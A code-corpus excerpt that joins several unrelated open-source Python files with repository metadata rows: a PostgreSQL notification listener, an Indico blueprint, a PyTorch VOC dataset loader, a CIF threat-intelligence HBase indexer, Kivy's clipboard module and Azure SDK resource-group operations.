DECLARE
new_row_from_view {schema}.{view_for_row}%ROWTYPE;
BEGIN
select * into new_row_from_view from {schema}.{view_for_row} where {view_selection_id} = NEW.id LIMIT 1;
PERFORM pg_notify(CAST('{change_name}' AS text),
'{{"old":' || {old} || ',"new":' || row_to_json(new_row_from_view)::text || '}}');
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
'''.format(schema=schema,
function_name=function_name,
table=table,
action=action,
old='row_to_json(OLD)::text' if action == 'UPDATE' or action == 'DELETE' else '\'null\'',
view_for_row=view_for_row,
view_selection_id=view_selection_id if view_selection_id else 'id',
change_name=change_name.lower())
else:
change_name = '''{table}_{action}'''.format(table=table, action=action)
function_name = '''NOTIFY_{change_name}'''.format(change_name=change_name)
function_sql = '''
CREATE OR REPLACE FUNCTION {schema}.{function_name}()
RETURNS TRIGGER AS $$
BEGIN
PERFORM pg_notify(CAST('{change_name}' AS text),
'{{"old":' || {old} || ',"new":' || {new} || '}}');
RETURN {value};
END;
$$ LANGUAGE plpgsql;
'''.format(schema=schema,
function_name=function_name,
table=table,
action=action,
old='row_to_json(OLD)::text' if action == 'UPDATE' or action == 'DELETE' else '\'null\'',
new='row_to_json(NEW)::text' if action == 'UPDATE' or action == 'INSERT' else '\'null\'',
value='OLD' if action == 'DELETE' else 'NEW',
change_name=change_name.lower())
trigger_name = 'TRIGGER_NOTIFY_%s' % function_name
trigger_sql = '''
CREATE TRIGGER {trigger_name}
AFTER {action} ON {schema}.{table}
FOR EACH ROW
EXECUTE PROCEDURE {schema}.{function_name}();
'''.format(trigger_name=trigger_name,
function_name=function_name,
schema=schema,
table=table,
action=action)
drop_sql = '''
DROP TRIGGER IF EXISTS {trigger_name} ON {schema}.{table} CASCADE;
DROP FUNCTION IF EXISTS {schema}.{function_name}();
'''.format(trigger_name=trigger_name,
function_name=function_name,
schema=schema,
table=table)
sql = drop_sql + '\n' + function_sql + '\n' + trigger_sql
sql_lines = '\n'.join([s.strip() for s in sql.split('\n')]) + '\n'
return sql_lines
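# Minimal usage sketch (assumes an existing psycopg2 cursor and a hypothetical
# schema/table; channel names follow the "<table>_<action>" convention above):
#
#   sql = makePostgresNotificationQueries('my_schema', 'task', 'UPDATE')
#   cursor.execute(sql)
#   # a PostgresListener below can then subscribe('task_update', callback)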
class PostgresListener(object):
    ''' This class lets you listen to postgres notifications.
    It executes callbacks when a notification occurs.
    Make your own subclass with your callbacks and subscribe them to the appropriate channel.
Example:
class MyListener(PostgresListener):
def __init__(self, host, database, username, password):
super(MyListener, self).__init__(host=host, database=database, username=username, password=password)
self.subscribe('foo', self.foo)
self.subscribe('bar', self.bar)
def foo(self, payload = None):
print "Foo called with payload: ", payload
def bar(self, payload = None):
print "Bar called with payload: ", payload
with MyListener(...args...) as listener:
#either listen like below in a loop doing stuff...
while True:
#do stuff or wait,
#the listener calls the callbacks meanwhile in another thread
#... or listen like below blocking
#while the listener calls the callbacks meanwhile in this thread
listener.waitWhileListening()
'''
def __init__(self,
host='',
database='',
username='',
password=''):
'''Create a new PostgresListener'''
self.conn = psycopg2.connect(host=host,
user=username,
password=password,
database=database)
self.conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
self.cursor = self.conn.cursor()
self.__listening = False
self.__lock = Lock()
self.__callbacks = {}
self.__waiting = False
self.__queue = Queue()
def subscribe(self, notification, callback):
'''Subscribe to a certain postgres notification.
Call callback method in case such a notification is received.'''
logger.info("Subscribed %sto %s" % ('and listening ' if self.isListening() else '', notification))
with self.__lock:
self.cursor.execute("LISTEN %s;", (psycopg2.extensions.AsIs(notification),))
self.__callbacks[notification] = callback
def unsubscribe(self, notification):
        '''Unsubscribe from a certain postgres notification.'''
logger.info("Unsubscribed from %s" % notification)
with self.__lock:
self.cursor.execute("UNLISTEN %s;", (psycopg2.extensions.AsIs(notification),))
if notification in self.__callbacks:
del self.__callbacks[notification]
def isListening(self):
'''Are we listening? Has the listener been started?'''
with self.__lock:
return self.__listening
def start(self):
'''Start listening. Does nothing if already listening.
When using the listener in a context start() and stop()
are called upon __enter__ and __exit__
This method return immediately.
Listening and calling callbacks takes place on another thread.
If you want to block processing and call the callbacks on the main thread,
then call waitWhileListening() after start.
'''
if self.isListening():
return
logger.info("Started listening to %s" % ', '.join([str(x) for x in self.__callbacks.keys()]))
def eventLoop():
while self.isListening():
if select.select([self.conn],[],[],2) != ([],[],[]):
self.conn.poll()
while self.conn.notifies:
try:
notification = self.conn.notifies.pop(0)
logger.debug("Received notification on channel %s payload %s" % (notification.channel, notification.payload))
if self.isWaiting():
# put notification on Queue
# let waiting thread handle the callback
self.__queue.put((notification.channel, notification.payload))
else:
# call callback on this listener thread
self._callCallback(notification.channel, notification.payload)
except Exception as e:
logger.error(str(e))
self.__thread = Thread(target=eventLoop)
self.__thread.daemon = True
self.__listening = True
self.__thread.start()
def stop(self):
'''Stop listening. (Can be restarted)'''
with self.__lock:
if not self.__listening:
return
self.__listening = False
self.__thread.join()
self.__thread = None
logger.info("Stopped listening")
self.stopWaiting()
def __enter__(self):
        '''starts the listener upon context enter'''
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
        '''stops the listener upon context exit'''
self.stop()
def _callCallback(self, channel, payload = None):
        '''call the appropriate callback based on channel'''
try:
callback = None
with self.__lock:
if channel in self.__callbacks:
callback = self.__callbacks[channel]
if callback:
if payload:
callback(payload)
else:
callback()
except Exception as e:
logger.error(str(e))
def isWaiting(self):
'''Are we waiting in the waitWhileListening() method?'''
with self.__lock:
return self.__waiting
def stopWaiting(self):
'''break from the blocking waitWhileListening() method'''
with self.__lock:
if self.__waiting:
self.__waiting = False
logger.info("Continuing from blocking waitWhileListening")
def waitWhileListening(self):
'''
block calling thread until interrupted or
until stopWaiting is called from another thread
meanwhile, handle the callbacks on this thread
'''
logger.info("Waiting while listening to %s" % ', '.join([str(x) for x in self.__callbacks.keys()]))
with self.__lock:
self.__waiting = True
while self.isWaiting():
try:
notification = self.__queue.get(True, 1)
channel = notification[0]
payload = notification[1]
self._callCallback(channel, payload)
except KeyboardInterrupt:
# break
break
except Empty:
pass
self.stopWaiting()
| gpl-3.0 | 248,377,241,846,325,470 | 38.388514 | 137 | 0.560854 | false |
DavidAndreev/indico | indico/modules/announcement/blueprint.py | 1 | 1100 | # This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.modules.announcement.controllers import RHAnnouncement
from indico.web.flask.wrappers import IndicoBlueprint
_bp = IndicoBlueprint('announcement', __name__, template_folder='templates', virtual_template_folder='announcement')
_bp.add_url_rule('/admin/announcement', 'manage', RHAnnouncement, methods=('GET', 'POST'))
| gpl-3.0 | 3,865,233,160,629,510,700 | 44.833333 | 116 | 0.766364 | false |
MegaShow/college-programming | Homework/Principles of Artificial Neural Networks/Week 8 Object Detection/datasets.py | 1 | 2942 | import torch
from torch.utils.data import Dataset
import json
import os
from PIL import Image
from utils import transform
class PascalVOCDataset(Dataset):
"""
A PyTorch Dataset class to be used in a PyTorch DataLoader to create batches.
"""
def __init__(self, data_folder, split, keep_difficult=False):
"""
:param data_folder: folder where data files are stored
:param split: split, one of 'TRAIN' or 'TEST'
:param keep_difficult: keep or discard objects that are considered difficult to detect?
"""
self.split = split.upper()
assert self.split in {'TRAIN', 'TEST'}
self.data_folder = data_folder
self.keep_difficult = keep_difficult
# Read data files
with open(os.path.join(data_folder, self.split + '_images.json'), 'r') as j:
self.images = json.load(j)
with open(os.path.join(data_folder, self.split + '_objects.json'), 'r') as j:
self.objects = json.load(j)
assert len(self.images) == len(self.objects)
def __getitem__(self, i):
# Read image
image = Image.open(self.images[i], mode='r')
image = image.convert('RGB')
# Read objects in this image (bounding boxes, labels, difficulties)
objects = self.objects[i]
boxes = torch.FloatTensor(objects['boxes']) # (n_objects, 4)
labels = torch.LongTensor(objects['labels']) # (n_objects)
difficulties = torch.ByteTensor(objects['difficulties']) # (n_objects)
# Discard difficult objects, if desired
if not self.keep_difficult:
boxes = boxes[1 - difficulties]
labels = labels[1 - difficulties]
difficulties = difficulties[1 - difficulties]
# Apply transformations
image, boxes, labels, difficulties = transform(image, boxes, labels, difficulties, split=self.split)
return image, boxes, labels, difficulties
def __len__(self):
return len(self.images)
def collate_fn(self, batch):
"""
Since each image may have a different number of objects, we need a collate function (to be passed to the DataLoader).
This describes how to combine these tensors of different sizes. We use lists.
Note: this need not be defined in this Class, can be standalone.
:param batch: an iterable of N sets from __getitem__()
:return: a tensor of images, lists of varying-size tensors of bounding boxes, labels, and difficulties
"""
images = list()
boxes = list()
labels = list()
difficulties = list()
for b in batch:
images.append(b[0])
boxes.append(b[1])
labels.append(b[2])
difficulties.append(b[3])
images = torch.stack(images, dim=0)
return images, boxes, labels, difficulties # tensor (N, 3, 300, 300), 3 lists of N tensors each
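
# --- Editor's note: illustrative sketch, not part of the original file. ---
# Shows how this dataset and its collate_fn might be wired into a DataLoader;
# the './data' folder, batch size and worker count are assumptions.
if __name__ == '__main__':
    from torch.utils.data import DataLoader

    dataset = PascalVOCDataset('./data', split='TRAIN', keep_difficult=False)
    loader = DataLoader(dataset, batch_size=8, shuffle=True,
                        collate_fn=dataset.collate_fn, num_workers=4)
    for images, boxes, labels, difficulties in loader:
        # images: (N, 3, 300, 300); boxes/labels/difficulties: lists of N tensors
        break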
| mit | -8,096,475,863,341,076,000 | 33.611765 | 125 | 0.616927 | false |
jeffmurphy/cif-db | src/DB/Exploder/Indexer.py | 1 | 10137 | import syslog
from datetime import datetime
import time
import re
import sys
import threading
import happybase
import struct
import hashlib
import base64
sys.path.append('/usr/local/lib/cif-protocol/pb-python/gen-py')
import msg_pb2
import feed_pb2
import control_pb2
import RFC5070_IODEF_v1_pb2
import MAEC_v2_pb2
import cifsupport
from DB.Salt import Salt
from DB.PrimaryIndex import PrimaryIndex
from DB.Log import Log
class Indexer(object):
"""
"""
def __init__ (self, connectionPool, index_type, num_servers = 1, table_batch_size = 1000, debug = 0):
self.debug = debug
print "indexer connect"
self.pool = connectionPool
print "indexer load primary index map"
self.primary_index = PrimaryIndex(connectionPool, debug)
print "index init log"
self.log = Log(connectionPool)
self.num_servers = num_servers
self.packers = {}
for packer in self.primary_index.names():
try:
package='DB.PrimaryIndex.PackUnpack'
self.L("loading packer " + package + "." + packer)
__import__(package + "." + packer)
pkg = sys.modules[package + "." + packer]
self.packers[packer] = getattr(pkg, packer)
except ImportError as e:
self.L("warning: failed to load " + packer)
with self.pool.connection() as dbh:
t = dbh.tables()
self.table_name = "index_" + index_type
if not self.table_name in t:
self.L("index table %s doesnt exist, creating it" % (self.table_name))
dbh.create_table(self.table_name, {'b': {'COMPRESSION': 'SNAPPY'}})
table_batch_size = 5
self.table = dbh.table(self.table_name).batch(batch_size=table_batch_size)
self.co_table = dbh.table("cif_objs").batch(batch_size=table_batch_size)
self.reset()
self.md5 = hashlib.md5()
self.salt = Salt(self.num_servers, self.debug)
def L(self, msg):
caller = ".".join([str(__name__), sys._getframe(1).f_code.co_name])
if self.debug != None:
print caller + ": " + msg
else:
self.log.L(caller + ": " + msg)
def pack_rowkey_ipv4(self, salt, addr):
return struct.pack(">HB", self.salt.next(), self.TYPE_IPV4()) + self.packers['ipv4'].pack(addr)
def pack_rowkey_ipv6(self, salt, addr):
return struct.pack(">HB", self.salt.next(), self.TYPE_IPV6()) + self.packers['ipv6'].pack(addr)
def pack_rowkey_fqdn(self, salt, fqdn):
return struct.pack(">HB", self.salt.next(), self.TYPE_FQDN()) + self.packers['domain'].pack(fqdn)
def pack_rowkey_url(self, salt, url):
return struct.pack(">HB", self.salt.next(), self.TYPE_URL()) + self.packers['url'].pack(url)
def pack_rowkey_email(self, salt, email):
return struct.pack(">HB", self.salt.next(), self.TYPE_URL()) + self.packers['email'].pack(email)
def pack_rowkey_search(self, salt, search):
return struct.pack(">HB", self.salt.next(), self.TYPE_SEARCH()) + self.packers['search'].pack(search)
def pack_rowkey_malware(self, salt, malware_hash):
return struct.pack(">HB", self.salt.next(), self.TYPE_MALWARE()) + self.packers['malware'].pack(malware_hash)
def pack_rowkey_asn(self, salt, asn):
return struct.pack(">HB", self.salt.next(), self.TYPE_ASN()) + self.packers['asn'].pack(asn)
def reset(self):
self.empty = True
self.addr = None
self.rowkey = None
self.confidence = None
self.addr_type = None
self.iodef_rowkey = None
def commit(self):
"""
Commit the record to the index_* table
Update cif_objs(rowkey=self.iodef_rowkey) so that 'b:{self.table_name}_{self.rowkey}' = 1
Purger will remove the reference when this feed record is purged.
        With HBase, you can put an additional cell value into a table/row without
        having to merge; existing cells won't be affected.
"""
try:
rowdict = {
'b:confidence': str(self.confidence),
'b:addr_type': str(self.addr_type),
'b:iodef_rowkey': str(self.iodef_rowkey)
}
self.table.put(self.rowkey, rowdict)
fmt = "%ds" % (len(self.table_name) + 4)
prk = struct.pack(fmt, "cf:" + str(self.table_name) + "_") + self.rowkey
self.co_table.put(self.iodef_rowkey, { prk: "1" })
except Exception as e:
self.L("failed to put record to %s table: " % self.table_name)
print e
self.reset()
def extract(self, iodef_rowkey, iodef):
"""
FIX atm this is iodef specific. ideally we will be able to index other document types
"""
self.reset()
self.iodef_rowkey = iodef_rowkey
self.md5.update(iodef.SerializeToString())
self.hash = self.md5.digest()
ii = iodef.Incident[0]
#print ii
self.confidence = ii.Assessment[0].Confidence.content
self.severity = ii.Assessment[0].Impact[0].severity
# for malware hashes, they appear at the top level for now
# iodef.incident[].additionaldata.meaning = "malware hash"
# iodef.incident[].additionaldata.content = "[the hash]"
if hasattr(ii, 'AdditionalData'):
for ed in ii.AdditionalData:
#print "ED ", ed
if ed.meaning == "malware hash":
self.L("\tIndexing for malware hash")
self.rowkey = self.pack_rowkey_malware(self.salt.next(), ed.content)
self.commit()
# addresses and networks are in the EventData[].Flow[].System[] tree
if len(ii.EventData) > 0 or hasattr(ii, 'EventData'):
for ed in ii.EventData:
for fl in ed.Flow:
for sy in fl.System:
for i in sy.Node.Address:
self.addr_type = i.category
if self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv4_addr or self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv4_net:
self.addr = i.content
self.rowkey = self.pack_rowkey_ipv4(self.salt.next(), self.addr)
self.L("Indexing for ipv4")
self.commit()
# ipv6 addresses and networks
elif self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv6_addr or self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ipv6_net:
self.addr = i.content
self.rowkey = self.pack_rowkey_ipv6(self.salt.next(), self.addr)
self.L("Indexing for ipv6")
self.commit()
elif self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_asn:
self.addr = i.content
                                self.rowkey = self.pack_rowkey_asn(self.salt.next(), self.addr)
self.L("Indexing for ASN")
self.commit()
elif self.addr_type == RFC5070_IODEF_v1_pb2.AddressType.Address_category_ext_value:
if i.ext_category == "fqdn":
self.fqdn = i.content
self.rowkey = self.pack_rowkey_fqdn(self.salt.next(), self.fqdn)
self.L("Indexing for FQDDN")
self.commit()
elif i.ext_category == "url":
self.rowkey = self.pack_rowkey_url(self.salt.next(), i.content)
self.L("Indexing for URL")
self.commit()
else:
e = self.primary_index.enum(i.ext_category)
if len(e) > 0:
self.rowkey = struct.pack(">HB", self.salt.next(), e[0]) + self.packers[i.ext_category].pack(i.content)
self.commit()
else:
self.L("Unknown primary index given " + i.ext_category)
else:
print "unhandled category: ", i
def TYPE_IPV4(self):
return self.primary_index.enum('ipv4')
def TYPE_IPV6(self):
return self.primary_index.enum('ipv6')
def TYPE_FQDN(self):
return self.primary_index.enum('domain')
def TYPE_URL(self):
return self.primary_index.enum('url')
def TYPE_EMAIL(self):
return self.primary_index.enum('email')
def TYPE_SEARCH(self):
return self.primary_index.enum('search')
def TYPE_MALWARE(self):
return self.primary_index.enum('malware')
def TYPE_ASN(self):
return self.primary_index.enum('asn')
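
# --- Editor's note: illustrative sketch, not part of the original file. ---
# A hypothetical way the indexer might be driven; the Thrift host, pool size and
# index type are assumptions, and iodef_rowkey/iodef_msg stand in for a stored
# row key and a parsed RFC5070_IODEF_v1_pb2 message.
#
#     pool = happybase.ConnectionPool(size=3, host='localhost')
#     indexer = Indexer(pool, 'demo', num_servers=1, debug=1)
#     indexer.extract(iodef_rowkey, iodef_msg)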
| bsd-3-clause | -6,272,114,305,446,935,000 | 39.710843 | 191 | 0.494722 | false |
Zen-CODE/kivy | kivy/core/clipboard/__init__.py | 1 | 3959 | '''
Clipboard
=========
Core class for accessing the Clipboard. If we are not able to access the
system clipboard, a fake one will be used.
Usage example::
>>> from kivy.core.clipboard import Clipboard
>>> Clipboard.get_types()
['TIMESTAMP', 'TARGETS', 'MULTIPLE', 'SAVE_TARGETS', 'UTF8_STRING',
'COMPOUND_TEXT', 'TEXT', 'STRING', 'text/plain;charset=utf-8',
'text/plain']
>>> Clipboard.get('TEXT')
'Hello World'
>>> Clipboard.put('Great', 'UTF8_STRING')
>>> Clipboard.get_types()
['UTF8_STRING']
>>> Clipboard.get('UTF8_STRING')
'Great'
.. note:: The main implementation relies on Pygame and works well with
text/strings. Anything else might not work the same on all platforms.
'''
__all__ = ('ClipboardBase', 'Clipboard')
from kivy.core import core_select_lib
from kivy.utils import platform
class ClipboardBase(object):
def get(self, mimetype):
'''Get the current data in clipboard, using the mimetype if possible.
        You should not use this method directly. Use :meth:`paste` instead.
'''
return None
def put(self, data, mimetype):
'''Put data on the clipboard, and attach a mimetype.
You should not use this method directly. Use :meth:`copy` instead.
'''
pass
def get_types(self):
'''Return a list of supported mimetypes
'''
return []
def _ensure_clipboard(self):
''' Ensure that the clipboard has been properly initialised.
'''
if hasattr(self, '_clip_mime_type'):
return
if platform == 'win':
self._clip_mime_type = 'text/plain;charset=utf-8'
# windows clipboard uses a utf-16 encoding
self._encoding = 'utf-16'
elif platform == 'linux':
self._clip_mime_type = 'UTF8_STRING'
self._encoding = 'utf-8'
else:
self._clip_mime_type = 'text/plain'
self._encoding = 'utf-8'
def copy(self, data=''):
''' Copy the value provided in argument `data` into current clipboard.
If data is not of type string it will be converted to string.
.. versionadded:: 1.9.0
'''
if data:
self._copy(data)
def paste(self):
        ''' Get text from the system clipboard and return it as a usable string.
.. versionadded:: 1.9.0
'''
return self._paste()
def _copy(self, data):
# explicitly terminate strings with a null character
# so as to avoid putting spurious data after the end.
# MS windows issue.
self._ensure_clipboard()
data = data.encode(self._encoding) + b'\x00'
self.put(data, self._clip_mime_type)
def _paste(self):
self._ensure_clipboard()
_clip_types = Clipboard.get_types()
mime_type = self._clip_mime_type
if mime_type not in _clip_types:
mime_type = 'text/plain'
data = self.get(mime_type)
if data is not None:
# decode only if we don't have unicode
# we would still need to decode from utf-16 (windows)
# data is of type bytes in PY3
data = data.decode(self._encoding, 'ignore')
# remove null strings mostly a windows issue
data = data.replace(u'\x00', u'')
return data
return u''
# load clipboard implementation
_clipboards = []
_platform = platform
if _platform == 'android':
_clipboards.append(
('android', 'clipboard_android', 'ClipboardAndroid'))
elif _platform in ('macosx', 'linux', 'win'):
_clipboards.append(
('sdl2', 'clipboard_sdl2', 'ClipboardSDL2'))
_clipboards.append(
('pygame', 'clipboard_pygame', 'ClipboardPygame'))
_clipboards.append(
('dummy', 'clipboard_dummy', 'ClipboardDummy'))
Clipboard = core_select_lib('clipboard', _clipboards, True)
del _clipboards
del _platform
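
# --- Editor's note: illustrative sketch, not part of the original file. ---
# The copy()/paste() helpers added in 1.9.0 wrap put()/get() and handle the
# platform-specific mime type and encoding; running this requires a working
# clipboard provider for the current platform.
if __name__ == '__main__':
    Clipboard.copy('Hello World')
    print(Clipboard.paste())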
| mit | 7,110,245,703,573,393,000 | 28.766917 | 79 | 0.591816 | false |
Azure/azure-sdk-for-python | sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_05_01/operations/_resource_groups_operations.py | 1 | 26144 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ResourceGroupsOperations(object):
"""ResourceGroupsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.resources.v2019_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def check_existence(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> bool
"""Checks whether a resource group exists.
:param resource_group_name: The name of the resource group to check. The name is case
insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
# Construct URL
url = self.check_existence.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
return 200 <= response.status_code <= 299
check_existence.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def create_or_update(
self,
resource_group_name, # type: str
parameters, # type: "_models.ResourceGroup"
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroup"
"""Creates or updates a resource group.
:param resource_group_name: The name of the resource group to create or update. Can include
alphanumeric, underscore, parentheses, hyphen, period (except at end), and Unicode characters
that match the allowed characters.
:type resource_group_name: str
:param parameters: Parameters supplied to the create or update a resource group.
:type parameters: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroup, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ResourceGroup')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ResourceGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-05-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes a resource group.
When you delete a resource group, all of its resources are also deleted. Deleting a resource
group deletes all of its template deployments and currently stored operations.
:param resource_group_name: The name of the resource group to delete. The name is case
insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ResourceGroup"
"""Gets a resource group.
:param resource_group_name: The name of the resource group to get. The name is case
insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGroup, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_05_01.models.ResourceGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ResourceGroup"]
error_map = {
